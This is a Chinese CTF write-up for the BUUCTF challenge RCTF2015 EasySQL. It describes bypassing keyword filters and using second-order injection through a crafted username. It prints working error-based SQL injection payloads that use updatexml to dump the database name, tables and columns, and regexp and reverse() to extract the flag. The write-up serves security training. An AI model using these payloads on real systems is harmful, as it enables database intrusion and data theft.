buuctf-[RCTF2015]EasySQL

本文探讨了SQL注入的常见手法,包括利用二次注入、报错注入以及正则函数来获取敏感信息。通过示例展示了如何注册含有危险字符的用户,利用updatexml函数进行信息爆破,以及针对不同数据库表和列进行信息泄露。同时,提到了reverse()函数在SQL注入中的应用。博客主要关注SQL安全和数据库漏洞利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Fuzz  测试
过滤:
	and  insert  ascii  substr  left rigth  sleep  floor  < like /**/  %20



思路:    注册带有危险符号的用户,登录之后修改密码,就能达到二次注入的效果



爆破:   admin"or(updatexml('~',concat('~',(),'~'),'~'))or"1


    用户:	admin"or(updatexml('~',concat('~',database(),'~'),'~'))or"1   
	
	XPATH syntax error: '~web_sqli~'



   表:  admin"or(updatexml('~',concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema='web_sqli')),'~'),'~'))or"1

	XPATH syntax error: '~article,flag,users~'


列: admin"or(updatexml('~',concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),'~'),'~'))or"1
	admin"or(updatexml('~',concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),'~'),'~'))or"1


	XPATH syntax error: '~flag~'
	name,pwd,email,real_flag_1s_her

	ereh_s1_galf_laer,liame,dwp,ema



flag       

	admin"or(updatexml('~',concat('~',(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')),'~'),'~'))or"1
	admin"or(updatexml('~',concat('~',(select(REVERSE(GROUP_CONCAT(real_flag_1s_here)))from(web_sqli.users)where(real_flag_1s_here)regexp('^f')),'~'),'~'))or"1

上面是自己研究的一些思路和姿势,以及写题的流程。

题目的考点是二次注入,报错注入,sql正则函数,reverse()函数。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值